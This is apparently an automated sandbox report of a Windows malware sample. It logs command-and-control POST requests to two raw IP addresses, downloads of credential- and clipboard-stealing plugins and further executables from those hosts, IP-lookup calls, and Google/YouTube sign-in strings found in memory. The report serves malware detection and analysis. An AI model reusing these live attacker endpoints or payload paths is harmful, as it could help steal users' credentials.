Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 104.26.5.15 104.26.5.15
Source: Joe Sandbox View IP Address: 193.233.132.56 193.233.132.56
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C4D8D0 recv,recv,recv,recv, 0_2_00C4D8D0
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Gdo9tp536UW6kVN&MD=MgdmHMVh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Gdo9tp536UW6kVN&MD=MgdmHMVh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-58101590&timestamp=1713476419682 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=Lwkr3AZE7EM; VISITOR_INFO1_LIVE=g9_VWJYh6aY; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYQ%3D%3D
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCPnA1BUIpu3MIhj2yc0BGNXdzQEY0/7NARjYhs4BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=212160193&timestamp=1713476453637 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCPnA1BUIpu3MIhj2yc0BGNXdzQEY0/7NARjYhs4BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: bad48ea9ac.exe, 0000001F.00000002.2819404632.0000000003F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000002.2690945819.0000000003E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountt equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000002.2754944956.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Dl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000002.2754944956.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Dl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=03K1P equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737331559.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: esktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737331559.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: esktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_h equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0aYouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0aYouTube/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0asive equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000002.2754944956.0000000007CD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0ayouty1 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en"D equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=ensE~ equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsig equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm= equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0/t equals www.youtube.com (Youtube)
